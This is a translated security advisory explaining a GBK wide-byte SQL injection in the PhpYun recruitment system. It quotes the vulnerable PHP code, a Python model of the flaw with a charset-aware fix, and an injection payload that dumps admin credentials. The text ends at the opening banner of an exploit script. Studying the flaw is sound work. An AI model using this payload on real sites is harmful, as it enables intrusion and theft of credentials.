PhpYun talent system: universal ("通杀") SQL injection and code execution vulnerabilities - Vulnerability Warning - Black Bar Safety Net

ID MYHACK58:62201027945
Type myhack58
Reporter Anonymous (佚名)
Modified 2010-09-27T00:00:00


PhpYun talent system is an open-source recruitment ("talent") system heavily promoted by php100, a portal site for the PHP industry. Because of php100's standing in the industry it was quickly adopted by webmasters, but it is after all a new product, and its code has serious security problems.

1. Wide-byte injection

Vulnerability description

The system defines the following code in config/db.safety.php:

function quotesGPC() {
    $_POST = array_map("addSlash", $_POST);
    $_GET = array_map("addSlash", $_GET);
    $_COOKIE = array_map("addSlash", $_COOKIE);
}

function addSlash($el) {
    if (is_array($el))
        return array_map("addSlash", $el);
    else
        return addslashes($el);
}

This code forces the GPC variables (GET, POST, COOKIE) through addslashes to increase safety, but, puzzlingly, it is never called anywhere in the system, so with magic_quotes_gpc turned off the system can be injected directly. Since PHP of that era turns magic_quotes_gpc on by default, every query variable is wrapped in single quotes in the SQL statements and integer variables are cast, so this point on its own is of limited value.

However, the whole system uses GBK encoding and does not filter the relevant characters, so wide-byte injection is possible in most places.

The following code:

if(isset($_GET[search])){
    .... Omitted irrelevant code //company type
    $where=!empty($_GET[exp])?"and a.exp='$_GET[exp]' ":null; //type of company
    $where.=!empty($_GET[edu])?"and'$_GET[edu]' ":null; //degree
    $where.=!empty($_GET[salary])?"and a.salary='$_GET[salary]' ":null; //monthly salary
    $where.=$_GET[keyword]!="The keyword"?"and like '%$_GET[keyword]%' ":null; //keywords
    ..... Omitted unrelated code
    $select=",a.uid, as jobname,a.number,,a.provinceid as jobcity,a.lastupdate,a.salary,a.description,,,b.mun";

    $searchsql=$obj->DB_select_alls("company_job","company","1 $where order by lastupdate desc limit $firstcount,$displaypg",$select);

Each variable is dropped into the query statement without any validation. Even with gpc on, sending %df' as the keyword closes the single quote of the SQL string: addslashes turns the quote into \' (bytes 0xDF 0x5C 0x27), and MySQL, reading the query as GBK, takes 0xDF 0x5C as a single two-byte character, so the quote is no longer escaped. Everything after it is parsed as SQL, and the account and password can be dumped.
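To make the mechanism concrete, the following Python model (an added example, not PhpYun's code and not from the article) reproduces what happens to a %df' keyword: addslashes() escapes byte by byte, a GBK decoder on the MySQL side merges 0xDF with the inserted backslash, and the quote is free again. The column name a.name, the benign keyword and the exact union payload are constructed assumptions (the article's own URL is truncated). The hardened variant shows what charset-aware escaping, which is what mysql_real_escape_string() does once mysql_set_charset('gbk') has been called, makes of the same input.

```python
"""Wide-byte (GBK) SQL injection against addslashes(), and a charset-aware
escape that closes it.

Added example, not PhpYun's code. It models in Python what the article
describes: PHP's addslashes()/magic_quotes_gpc escapes byte-by-byte, while a
GBK-configured MySQL server re-reads the bytes as multibyte characters.
"""
from typing import Optional
from urllib.parse import unquote_to_bytes

# Constructed inputs. The column name a.name (below) and this payload are
# assumptions; the article's own URL is truncated.
BENIGN_KEYWORD = unquote_to_bytes("php%27dev")  # php'dev: a keyword with a quote
ATTACK_KEYWORD = unquote_to_bytes(
    "%df%27%20union%20select%201,2,"
    "concat(0x40,0x23,username,0x7e,password,0x23,0x40),"
    "4,5,6,7,8,9,10,11,12%20from%20phpyun_admin_user--%20x"
)


def addslashes(raw: bytes) -> bytes:
    """PHP addslashes(): prefixes ' " \\ and NUL with a backslash, one byte
    at a time, with no knowledge of the connection charset."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)  # the backslash that %df will swallow
        out.append(b)
    return bytes(out)


def build_where(keyword: bytes) -> bytes:
    """The concatenation pattern from the article's search code
    (column name a.name is assumed)."""
    return b"1 and a.name like '%" + keyword + b"%' order by lastupdate desc"


def has_unescaped_quote(fragment: bytes) -> bool:
    """Read an escaped keyword the way a GBK MySQL server would and report
    whether any single quote is left outside a backslash escape."""
    text = fragment.decode("gbk", errors="replace")
    return any(
        ch == "'" and (i == 0 or text[i - 1] != "\\")
        for i, ch in enumerate(text)
    )


def vulnerable_where(keyword: bytes) -> bytes:
    """What PhpYun effectively runs: magic_quotes-style escaping, then raw
    interpolation into a GBK SQL string."""
    return build_where(addslashes(keyword))


def escape_gbk_aware(raw: bytes) -> bytes:
    """Charset-aware escaping: decode as GBK first, so a lone 0xDF lead byte
    followed by 0x27 is rejected instead of being escaped into a valid
    two-byte character. A prepared statement avoids the problem entirely."""
    text = raw.decode("gbk")  # raises UnicodeDecodeError on a broken lead byte
    escaped = (
        text.replace("\\", "\\\\")
        .replace("'", "\\'")
        .replace('"', '\\"')
        .replace("\x00", "\\0")
    )
    return escaped.encode("gbk")


def hardened_where(keyword: bytes) -> Optional[bytes]:
    """Return the WHERE fragment, or None when the keyword is not valid GBK."""
    try:
        return build_where(escape_gbk_aware(keyword))
    except UnicodeDecodeError:
        return None


if __name__ == "__main__":
    print("benign, addslashes :", addslashes(BENIGN_KEYWORD))
    print("attack, addslashes :", addslashes(ATTACK_KEYWORD))
    print("attack as GBK text :", addslashes(ATTACK_KEYWORD).decode("gbk"))
    print("quote escaped?     :", not has_unescaped_quote(addslashes(ATTACK_KEYWORD)))
    print("hardened (attack)  :", hardened_where(ATTACK_KEYWORD))
    print("hardened (benign)  :", hardened_where(BENIGN_KEYWORD))
```

Running it shows the escaped attack keyword decoding to a CJK character followed by a bare quote and the union select, while the charset-aware path refuses the input outright because 0xDF 0x27 is not a valid GBK sequence.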

Exploitation:

Carefully constructed injection statement (fragment):

,2,concat(0x40,0x23,username,0x7e,password,0x23,0x40),4,5,6,7,8,9,10,11,12%20from%20phpyun_admin_user--%20sdfsd&provinceid=&mySearchCityName=&mySearchCity=&search=%CB%D1%CB%F7

(search=%CB%D1%CB%F7 is "搜索", search, in GBK.) This pulls the backend account and password out of the phpyun_admin_user table.

Attached exploit:

<?php
/**
 * PhpYun talent system wide-byte injection exp
 **/
print_r('
+--------------------------------------------------------------------+
    PhpYun RenCai System Remote SQL Injection Exploit By l4yn3 Blog
+--------------------------------------------------------------------+
');
